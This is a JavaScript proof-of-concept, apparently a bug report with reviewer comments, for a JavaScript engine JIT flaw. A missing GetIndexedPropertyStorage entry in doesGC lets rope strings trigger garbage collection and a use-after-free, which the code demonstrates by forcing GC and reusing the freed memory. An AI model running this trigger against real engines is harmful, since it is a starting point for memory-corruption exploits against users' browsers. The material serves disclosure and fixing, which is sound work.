/*
 * The doesGC function simply takes a node, and tells if it might cause a
 * garbage collection. This function is used to determine whether to insert
 * write barriers. But it's missing GetIndexedPropertyStorage that can cause
 * a garbage collection via rope strings. As a result, it can lead to UaF.
 *
 * Reviewer notes (defensive reading of this PoC):
 *  - Bug class: a JIT-side "this node cannot GC" assumption that is wrong
 *    for one node kind, so a barrier/keep-alive the compiler would normally
 *    emit is omitted. The fix implied by the description is to report
 *    GetIndexedPropertyStorage as GC-capable in doesGC.
 *  - Nothing below is portable JavaScript: `print` is the engine-shell
 *    output function, and the effect depends on the DFG tier being reached,
 *    so the exact iteration counts and statement order matter. Do not
 *    "tidy" this code expecting the same outcome.
 *
 * PoC:
 */

// Allocation pressure intended to provoke a garbage collection.
// 10 x 10 MiB ArrayBuffers; the buffers are discarded immediately.
function gc() {
  for (let i = 0; i < 10; i++) {
    new ArrayBuffer(1024 * 1024 * 10);
  }
}

// The function that main() warms up so it gets JIT-compiled.
// The repeated arr[i].charAt(0) calls are presumably what makes the
// compiler emit GetIndexedPropertyStorage for each element; with rope
// strings as inputs (see main) that node can allocate and hence GC,
// which doesGC does not account for. `o` is allocated before those
// calls and written to afterwards, so a GC in between is the hazard.
function opt(arr) {
  let r = /a/;
  let o = {};
  arr[0].charAt(0);
  arr[1].charAt(0);
  arr[2].charAt(0);
  arr[3].charAt(0);
  arr[4].charAt(0);
  arr[5].charAt(0);
  arr[6].charAt(0);
  arr[7].charAt(0);
  arr[8].charAt(0);
  // NOTE(review): arr[8] is accessed twice and is the only duplicated
  // index; reads like a typo, kept verbatim because it is part of what the
  // JIT observed when the PoC was recorded.
  arr[8].charAt(0);
  arr[9].charAt(0);
  // The match result array is allocated right after the possibly-GCing
  // nodes above and stored into `o`; this is the store whose barrier /
  // liveness handling the missing doesGC entry affects (inferred from the
  // description — TODO confirm against the engine source).
  o.x = 'a'.match(r);
  return o;
}

function main() {
  // Warm-up with flat (non-rope) strings so opt() is compiled under the
  // assumption that the charAt path cannot allocate.
  for (let i = 0; i < 10000; i++) {
    opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]);
  }
  // Two 2 MiB strings; `a + b` below presumably yields a rope string
  // (lazy concatenation) rather than a flat one, which is the "via rope
  // strings" path the description refers to.
  let a = 'a'.repeat(1024 * 1024 * 2);
  let b = 'a'.repeat(1024 * 1024 * 2);
  let arr = [];
  for (let i = 0; i < 10; i++) {
    arr[i] = a + b;
  }
  gc();
  // Call the compiled opt() with rope inputs: resolving them can GC in a
  // spot the JIT treated as GC-free.
  let o = opt(arr);
  // Second GC so that anything left dangling is actually reclaimed,
  // then allocate a small array to reuse freed memory.
  gc();
  let tmp = [1234];
  // Expected output per the original author is 1234: o.x no longer
  // shows the match result but the contents of `tmp`, i.e. a
  // use-after-free made visible. Expected: "a" (the match) on a fixed engine.
  print(o.x);// 1234
}
main();